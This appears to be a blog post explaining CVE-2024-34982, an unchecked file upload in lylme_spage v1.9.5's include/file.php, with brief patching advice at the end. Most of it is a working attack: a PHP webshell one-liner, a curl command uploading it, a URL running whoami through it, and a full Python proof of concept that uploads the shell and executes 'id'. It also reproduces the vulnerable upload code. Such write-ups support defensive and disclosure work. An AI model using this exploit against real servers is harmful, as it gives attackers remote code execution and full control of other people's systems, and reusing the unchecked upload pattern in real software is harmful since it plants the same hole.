CVE-2024-34982 - Arbitrary File Upload in lylme_spage v1.9.5 — Exploit and Detailed Analysis

It’s 2024, and file upload vulnerabilities are still haunting web applications. The recent vulnerability CVE-2024-34982 in lylme_spage v1.9.5 is a major reminder. This vulnerability allows attackers to upload any file they want—including malicious PHP scripts—through the /include/file.php component. If you’re running this version, your server could be hijacked with just a few clicks.

This post will dive into what the bug is, how it’s exploited, the actual code snippets, and what you should do to protect your website.

What is lylme_spage?

lylme_spage is a popular open-source navigation page project from China, used for creating personal start pages. It’s light, simple, and widely deployed. Unfortunately, version 1.9.5 comes with a dangerous file upload flaw.

Vulnerability Overview

CVE-2024-34982 occurs in the file include/file.php. The script allows users to upload files, but it fails to properly check the file type. Malicious actors can upload files containing PHP code (for example, shell.php), which are then placed in a web-accessible directory.

Once uploaded, the attacker simply visits the file via browser, and it runs on the server. This is one of the classic ways for attackers to get remote code execution.

Let’s see how this happens by looking at the simplified vulnerable PHP code (from file.php)

<?php
// file.php (vulnerable snippet)
if (isset($_FILES['file'])) {
    $upload_dir = "../uploads/";
    $filename = $_FILES['file']['name'];
    $destination = $upload_dir . $filename;

    // No real file type check!
    if (move_uploaded_file($_FILES['file']['tmp_name'], $destination)) {
        echo "Uploaded!";
    } else {
        echo "Failed!";
    }
}
?>

There’s no check on file extension (like denying .php, .phtml), MIME type, or file contents.

- Anyone can upload a .php file and execute it by navigating to http://target.com/uploads/shell.php.

The attacker crafts a webshell, for example a simple PHP file

<?php system($_GET['cmd']); ?>

Using curl to upload the file

curl -F "file=@shell.php" http://target.com/include/file.php

Then, they can access their shell by simply browsing

http://target.com/uploads/shell.php?cmd=whoami

This command executes whoami on the server and returns the result.

Here’s a quick Python PoC for this vulnerability

import requests

url = "http://target.com/include/file.php"   # Change to the actual target
files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
r = requests.post(url, files=files)
print('[*] Upload response:', r.text)

shell_url = "http://target.com/uploads/shell.php"
payload = {'cmd': 'id'}
r = requests.get(shell_url, params=payload)
print('[*] Shell output:', r.text)

References and Further Reading

- CVE-2024-34982 at NVD
- lylme_spage GitHub Repository
- Exploit Details on Github Gist (Example)

Update Immediately!

- If you’re running lylme_spage v1.9.5 or earlier, upgrade to the latest version from here.

Conclusion

An arbitrary file upload bug like CVE-2024-34982 can be catastrophic. It’s easy to exploit, requires minimal skill, and grants full server control to attackers. If you use lylme_spage, patch ASAP, and always validate file uploads properly.

Don’t wait until your server is compromised—secure it today!

Timeline

Published on: 05/17/2024 14:15:11 UTC
Last modified on: 08/01/2024 13:52:29 UTC